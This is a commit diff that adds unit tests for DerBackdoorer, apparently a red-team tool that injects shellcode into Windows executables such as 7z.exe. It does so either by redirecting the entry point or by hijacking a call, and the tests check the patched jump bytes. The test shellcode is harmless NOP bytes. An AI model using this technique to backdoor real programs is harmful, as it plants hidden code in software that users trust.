refactor: RedBackdoorer -> DerBackdoorer

2026-06-02 17:27:10 +00:00 · 2024-02-18 13:47:30 +00:00
parent 3969f3d882
commit 0a476bdce6
4 changed files with 708 additions and 1321 deletions
@@ -0,0 +1,98 @@
+import shutil
+from typing import List
+import unittest
+import logging
+
+from model import ExeInfo
+from defs import *
+from pehelper import extract_code_from_exe
+from helper import hexdump
+
+from derbackdoorer.derbackdoorer import PeBackdoor
+
+
+# What to make sure of: 
+# 1: Change of AddressEntryPoint
+#   * Shellcode is at the location given
+#   * EP points to the shellcode
+#
+# 2: Hijack
+#   * Shellcode is at the location given
+#   * The call has been patched
+
+class DerBackdoorerTest(unittest.TestCase):
+    def test_backdoor_ep(self):
+        # Write example shellcode
+        shellcode = b"\x90" * 200
+        with open("exes/shellcode.test", "wb") as f:
+            f.write(shellcode)
+
+        shellcode_path = "exes/shellcode.test"
+        exe_path = "exes/iattest-full.exe"
+        exe_out_path = "exes/iattest-full-test.exe"
+
+        shutil.copyfile(exe_path, exe_out_path)
+
+        peinj = PeBackdoor()
+        result = peinj.backdoor(
+            1, # always overwrite .text section
+            1, # EntryPoint change
+            shellcode_path, 
+            exe_path,
+            exe_out_path,
+        )
+
+        self.assertTrue(result)
+        code = extract_code_from_exe(exe_out_path)
+        extracted_code = code[peinj.shellcodeOffsetRel:peinj.shellcodeOffsetRel+len(shellcode)]
+        self.assertEqual(shellcode, extracted_code)
+
+        os.remove(exe_out_path)
+
+
+    def test_backdoor_hijack(self):
+        # Write example shellcode
+        shellcode = b"\x90" * 200
+        with open("exes/shellcode.test", "wb") as f:
+            f.write(shellcode)
+
+        shellcode_path = "exes/shellcode.test"
+        exe_path = "exes/7z.exe"
+        exe_out_path = "exes/7z-test.exe"
+
+        shutil.copyfile(exe_path, exe_out_path)
+
+        peinj = PeBackdoor()
+        result = peinj.backdoor(
+            1, # always overwrite .text section
+            2, # Hijack
+            shellcode_path, 
+            exe_path,
+            exe_out_path,
+        )
+
+        self.assertTrue(result)
+
+        # code
+        code = extract_code_from_exe(exe_out_path)
+        extracted_code = code[peinj.shellcodeOffsetRel:peinj.shellcodeOffsetRel+len(shellcode)]
+        self.assertEqual(shellcode, extracted_code)
+
+        # jmp
+        #  48 c7 c2 d7 fb 42 00 ff d2 5b 0f b7
+        #  48 c7 c6 d7 fb 42 00 ff d6 5b 0f b7
+        jmp_code = code[peinj.backdoorOffsetRel:peinj.backdoorOffsetRel+12]
+        self.assertEqual(jmp_code[0], 0x48)
+        self.assertEqual(jmp_code[1], 0xc7)
+        #self.assertEqual(jmp_code[2], 0x??)  # variable
+        self.assertEqual(jmp_code[3], 0xd7)
+        self.assertEqual(jmp_code[4], 0xfb)
+        self.assertEqual(jmp_code[5], 0x42)
+        self.assertEqual(jmp_code[6], 0x00)
+        self.assertEqual(jmp_code[7], 0xff)
+        #self.assertEqual(jmp_code[8], 0x??) # variable
+        self.assertEqual(jmp_code[9], 0x5b)
+        self.assertEqual(jmp_code[10], 0x0f)
+        self.assertEqual(jmp_code[11], 0xb7)
+
+        os.remove(exe_out_path)